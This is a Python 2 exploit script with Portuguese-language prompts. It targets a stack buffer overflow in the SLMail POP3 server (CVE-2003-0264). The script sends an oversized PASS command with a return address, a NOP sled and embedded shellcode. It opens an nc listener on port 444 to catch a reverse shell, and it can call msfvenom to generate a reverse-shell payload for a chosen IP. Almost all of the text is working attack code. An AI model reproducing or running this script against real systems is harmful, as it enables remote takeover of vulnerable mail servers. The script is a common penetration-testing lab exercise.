SLMail version 5.1.0.4420 remote code execution exploit.
fb80ef2495dd59e60f4f343bd7cf02a2
# -*- coding: utf-8 -*-
import socket
from time import sleep
from os import system
system("clear")
print 'Shell-code-foi-informada?\r\n'
print '[1] sim'
print '[2] nao\n'
quest = int(input('>>> '))
def main():
system("clear")
#============================
#--ensira-sua-shell-code-aqui
buf = ""
buf += "\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29"
buf += "\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31"
buf += "\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e"
buf += "\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65"
buf += "\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54"
buf += "\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5"
buf += "\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d"
buf += "\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27"
buf += "\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46"
buf += "\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31"
#===========================
print 'Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)'
print '\nby: - Mednic -\r\n'
host = raw_input('Host: ')
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 39 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sleep(3)
print '\nIniciando conexão ao servidor...\n'
sleep(2)
try:
s.connect((host, 110))
s.recv(1024)
except:
print 'Conexão recusada !'
exit()
s.settimeout(1)
print '\nEnviando usuario...\n'
s.send("USER guest\r\n")
s.recv(1024)
s.settimeout(1)
print '\nIniciando estouro de buffer...\n'
system('nc -nlvp 444')
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()
if quest == 1:
main()
elif quest == 2:
print "IP para conexão reversa !"
ip = raw_input('>>> ')
system('clear')
system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'\\x00\\x0a\\x0d\\x20'+" -f python")
print '\r\nCopie e substitua pelo setado no codigo !'
else:
print 'Invalido argumento'
exit()